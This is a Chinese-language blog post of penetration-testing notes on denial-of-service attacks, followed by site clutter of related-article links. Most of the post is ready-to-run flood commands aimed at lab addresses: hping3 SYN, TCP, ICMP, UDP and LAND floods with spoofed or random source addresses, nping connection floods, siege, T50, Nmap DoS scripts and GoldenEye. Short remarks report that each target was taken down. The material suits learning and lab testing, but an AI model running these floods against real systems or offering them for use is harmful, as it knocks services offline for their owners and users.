【渗透测试笔记】之【拒绝服务攻击】

最新推荐文章于 2023-02-03 16:45:13 发布
最新推荐文章于 2023-02-03 16:45:13 发布
阅读量763 收藏 3
点赞数
分类专栏: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/107905321
版权

Hping3

几乎可以发送任何TCP/IP 数据包,用于测试FW、端口扫描、性能测试。

Syn Flood 攻击

方式1

hping3 -c 1000 -d 120 -S -w 64 -p 80 --flood --rand-source 192.168.2.100
#-c:发多少个包
#-d:数据段有多大
#-S:Syn数据包
#-w:tcp头window的大小(默认就是64)
#-p:攻击目标端口
#--flood:以flood 方式发送
#--rand-source:随机源地址

此时靶机已经被打死:
在这里插入图片描述

方式2

hping3 -S -P -U -p 80 --flood --rand-source 192.168.2.100

此时靶机同样被打死:
在这里插入图片描述

TCP Flood 攻击

hping3 -SARFUP -p 80 --flood --rand-source 192.168.2.100

ICMP Flood 攻击

hping3 -q -n --icmp -d  200 --flood --rand-source 192.168.2.101
#-n:不解析域名
#-a:伪造源地址

UDP Flood 攻击

hping3 --udp -s 53 -d 100 -p 53 --flood 192.168.2.101

LAND 攻击

特殊类型SYN Flood 攻击
源地址和目标地址都是受害者,受害者与自己完成三次握手。

hping3 -n -a 192.168.2.101 -S -d 100 -p 80 --flood 192.168.2.101

Nping

TCP 全连接 DoS 攻击

nping --tcp-connect --rate=10000 -c 100000000 -q 192.168.2.101

成功打死:
在这里插入图片描述

Siege

http(s) 压力测试工具,模拟多个用户并发访问。
安装:

spt-get install siege

修改上限:

vi /etc/siege/siegerc

limit 255改为limit 100000

siege -i -c -t 5 1000 http://192.168.2.101/dvwa/login.php -A Useragent -vv
#-i:模拟用户
#-c:用户数量
#-t:持续5分钟
#-A:Useragent

"concurrency"是实际并发数,取决于攻击方性能。

T50 压力测试

t50 192.168.2.101 --flood --turbo -S --protocol TCP --dport 80
t50 192.168.2.101 --flood --turbo -S --protocol TCP UDP OSPF EIGRP --dport 80

Nmap

进入nmap脚本目录:

cd /usr/share/nmap/scripts

cat script.db | grep dos | cut -d "\"" -f 2

使用方法:

nmap -p445 --script=smb-vuln-ms10-054.nse 1.1.1.1

GoldenEye

下载地址:https://github.com/jseidl/GoldenEye/archive/master.zip

使用方法:

./goldeneye.py http://192.18.2.2.102 -w 500 -s 10 -m random

效果明显,直接打死
在这里插入图片描述

AA8j
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
【安全牛学习笔记拒绝服务攻击工具-NMAP、匿名者拒绝服务工具包(匿名者发布的DoS工具)、其他拒绝服务工具-XOIC、HULK、DDOSIM、GoldenEye
edu_aqniu的博客
10-17 6546
拒绝服务攻击工具                                                   Nmap                                                                    - grep dos /usr/share/nmap/scripts/script.db | cut -d "\"" -f 2
渗透测试学习笔记之案例一.pdf
04-06
### 渗透测试学习笔记之案例一 #### 1. 前言 在渗透测试领域,持续的技术积累和实战经验分享对于个人成长至关重要。本文档记录了一个具体的渗透测试案例,旨在通过实战演练来加深对渗透测试技术的理解,并为后续的...
WEB安全性测试-拒绝服务攻击
wanglijia26的专栏
04-16 631
学习章节: 测试入门到精通\软件测试零基础入门资料2015\第二阶段:WEB测试模块\5.web安全性测试\第2章 2.WEB安全性测试--拒绝服务攻击 学习内容:
拒绝服务攻击
weixin_46244909的博客
03-22 264
拒绝服务攻击基础知识 DDos分布式拒绝服务攻击 一对一的攻击,多对一的攻击。 原理: 占用服务器资源从而达到资源用尽,拒绝服务。 基本的工具: RUDY 脚本下载地址https://sourceforge.net/projects/r-u-dead-ret/ 特点: 慢速应用层http post攻击与slowhttptest的原理相同,每次只传输一个字节...
python编写ARP拒绝服务攻击脚本--网路嗅探
YeD666的博客
03-26 1959
python编写ARP拒绝服务攻击脚本--网路嗅探
EPoD: 以太坊Geth客户端拒绝服务漏洞 (CVE-2018-12018)
Fly_鹏程万里
07-15 966
迄今为止,PeckShield发现了很多严重的智能合约漏洞。除了智能合同外,以太坊生态系统还包括其他各种可能受到攻击的组件。显然,一个这样的组件是以太坊的核心,也就是每个以太坊节点上运行的底层客户端软件。如果攻击者使某个以太坊客户端/节点崩溃,那么此客户端/节点提供的计算能力也随之消失。如果大量以太坊的客户/节点突然间断线,他们相应的计算能力可能会立即失效,从而严重干扰以太坊的整个运营。在撰写本文...
读书笔记之python渗透测试.docx
最新发布
04-13
### 读书笔记之Python渗透测试知识点汇总 #### 黑盒测试工具 1. **Burp Suite**:一种常用的集成平台,用于执行Web应用程序的安全测试。它包含多种工具,如Proxy、Intruder、Spider等,可以帮助用户发现并利用Web...
python之渗透测试笔记(一)
01-20
python之渗透测试(一)—— Socket模块Socket模块须知简介基本用法使用Socket编写一个简单的服务端和客户端 Socket模块须知 在TCP/IP协议族中,Socket并不是协议,而是一个编程接口。 TCP/IP是传输层协议,主要解决...
渗透测试入门——渗透测试笔记
01-27
CMS同样能在网上找到许多漏洞,常用作渗透测试的练习靶机。根据提示,第1题要求找到咨询平台的管理员账号密码;第2题需要登录服务器后台,并插入木马,再用中国菜刀连接,继而找到在管理员桌面上的 flag文件;第3题...
渗透测试笔记.rar
02-25
《Metasploit渗透测试魔鬼训练营》这本书是渗透测试领域的经典之作,它详尽地介绍了如何利用Metasploit框架进行有效的渗透测试。Metasploit是一个开源的安全框架,提供了大量的漏洞利用模块,帮助安全专家进行安全...
DOS拒绝服务攻击代码
10-18
DOS拒绝服务攻击代码,仅供学习使用。
‘冰封’合约背后的老牌劲敌 | 链安团队漏洞分析连载第二期 —— 拒绝服务漏洞
链安科技的博客
07-26 487
针对区块链安全问题,链安科技团队每一周都将出智能合约安全漏洞解析连载,希望能帮助程序员写出更加安全牢固的合约,防患于未然。 引子:秦人不暇自哀,而后人哀之;后人哀之而不鉴之,亦使后人而复哀后人也。                                                       —— 《阿房宫赋》 上回讲到 溢出漏洞引增发,币值一落千万丈,黑客造假本领大,Saf...
拒绝服务攻击工具
分享学习网络的点点滴滴
11-12 537
● 慢速应用层HTTP POST攻击,与slowhttptest原理相同● 每次只传输一个字节的数据● 美剧“黑客军团”中曾提到此攻击手段● 攻击又表单WEB页面,攻击时需指定攻击的参数名称从上面的网站进行下载,解压即可● 如上图,修改一下rudeadyet.conf修改一个你要攻击的URL,attack_parameter后面跟着你要攻击的表单名DVWA无法访问。
拒绝服务攻击检测》实验报告&操作流程
weixin_62495164的博客
04-19 1808
实验内容 理解拒绝服务攻击导致的资源消耗原理和危害,自主设计构建网络攻击场景。 开发和执行拒绝服务攻击程序,并从网络用户端对比存在和不存在网络 攻击两种场景下访问网络应用的情况。 使用网络流量分析工具 Wireshark 等观察、分析和总结拒绝服务攻击流 量特征。 实验环境 网络安全虚拟仿真实验系统 实验步骤与实验结果 3.1步骤一 登录网络安全虚拟仿真实验系统 (bupt.edu.cn) 创建网络拓扑。创建拒绝服务攻击网络拓扑。选择“实例管理-创建实例拓扑”,通过拖拽方式在场景中构建 We
渗透测试-----9-拒绝服务(黑客其它的攻击方式)
weixin_62693307的博客
02-03 2013
Flood攻击原理相悖,它正是利用建立TCP/IP三次握手连接来实现拒绝服务攻击,而且与Syn-Flood不同它并非通过耗尽服务器的TCP连接数来让正常用户的正常请求无法响应,而是直接耗尽服务端的内存、CPU等资源让受害者宕机,属于非对称的资源消耗攻击,这种攻击方式的危害性极大,而且一旦遭受分布式攻击是几乎不能被抵御的。SYN Flood利用TCP协议缺陷,它通过一定的操作破坏TCP三次握手建立正常连接,占用并耗费系统资源,使得被攻击方资源耗尽,无法及时回应或初一正常的服务请求。
渗透测试流程及方法论讲解(web安全入门04)
黑战士的博客
01-11 1087
一、渗透测试方法论 1.1 渗透测试(penetration testing,pentest) 是实施安全评估(即审计)的具体手段。 方法论是在制定、实施信息安全审计方案时,需要遵循的规则、惯例和过程。 人们在评估网络、应用、系统或者三者组合的安全状况时,不断摸索各种务实的理念和成熟 的做法,并总结了一套理论——渗透测试方法论。 1.2 渗透测试种类 1.2.1 黑盒测试 在进行黑盒测试时,安全审计员在不清楚被测单位的内部技术构造的情况下,从外部评估网 络基础设施的安全性。 在渗透测试的各个阶段,黑盒测试借
linux 命令:ping、fping、gping、hping3、nping、tracert、traceroute、ip 和 ifconfig
热门推荐
freeking101的博客
05-20 8万+
linux 命令:ping、fping、gping、hping3、nping、tracert、traceroute
pythonddos防御_浅谈拒绝服务攻击的原理与防御(7):用Python和C实现syn flood攻击...
weixin_39778003的博客
11-22 326
*原创作者:黑戈爾,本文属FreeBuf原创奖励计划,未经许可禁止转载0x01 前言以前做DDOS的实验都是用python来编写工具的,开始不会编写结构不会算校验和的时候就用scapy写,后来学会了报文结构开始自己构造各种报文,但是用python写成之后虽然是能实现基本功能,但是性能太差,其不到攻击效果,然后又开始学c语言,用c语言重写了syn flood攻击工具,今天我把python和c的源码都...
渗透测试笔记】之【SQLMap】
AA8j的博客
07-21 2523
SQL Map 五种漏洞检测技术 基于布尔的盲注检测 基于时间的盲注检测 基于错误的检测 基于UNION 联合查询的检测 基于堆叠查询的检测 GET sqlmap -u "http://192.168.2.101/mutillidae/index.php?page=user-info.php&username=a&password=a&user-info-php-submit-button=View+Account+Details" -p username -f -p:检查哪个
BackTrack渗透测试学习笔记概述
笔记涵盖了Metasploit渗透测试指南、信息收集、身份识别、社会工程学攻击、Metasploit运用层攻击、局域网攻击以及维持访问等多个渗透测试的重要环节。作者强调,该笔记并非专业教材,而是个人经验的汇集,适合那些在...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值